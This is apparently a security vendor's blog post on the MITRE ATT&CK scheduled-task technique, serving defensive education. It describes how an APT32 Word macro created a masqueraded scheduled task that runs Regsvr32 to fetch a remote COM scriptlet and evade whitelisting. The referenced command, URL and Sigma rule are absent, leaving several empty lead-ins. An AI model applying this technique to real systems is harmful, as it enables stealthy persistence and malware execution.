How to Simulate and Detect MITRE ATT&CK T1053 Scheduled Task/Job Technique
by Süleyman Özarslan, PhD
scheduled task is a command, program or script to be executed at:
- a particular time in the future (e.g. 11/08/2022 1:00 a.m.
- at regular intervals (e.g. every Monday at 1:00 a.m.)
- when a defined event occurs (e.g. a user logs on the system).
Legitimate users like system administrators use scheduled tasks to create and run operational tasks automatically. Adversaries also use task scheduling utilities of operating systems to execute malicious payloads on a defined schedule or at system startup to achieve persistence. Our research has found that Scheduled Task was the seventh most prevalent MITRE ATT&CK technique used by adversaries in their malware.
Red and Blue Team Exercises
Red Teaming — How to simulate?
In this exercise, we explain a real scheduled task command in a malicious VBA macro in a Word document that was used by the
APT32 Threat Group.
This payload was included in the following Word document:
Briefly, the below command in the VBA code embedded in the Word document creates a scheduled task named
SystemSoundsServices (mimicking System Sounds Service of Windows) to run
Regsvr32.exe every 30 minutes.
Regsvr32.exe is used to bypass application whitelisting script protection for executing a Component Object Model (COM) scriptlet that is dynamically downloaded from the given URL.
In conclusion, the given code incorporates following MITRE ATT&CK techniques:
- T1053.005 Scheduled Task
- T1036.004 Masquerading: Masquerade Task or Service
- T1218.010 Signed Binary Proxy Execution: Regsvr32
- T1559.01 Inter-Process Communication: Component Object Model
If you’d like to learn more about MITRE ATT&CK, check out our LinkedIn group with all the latest! https://www.linkedin.com/groups/8955879/
Blue Teaming — How to detect?
Sigma rule can be used to detect creating a scheduled task that runs
Originally published at https://www.picussecurity.com.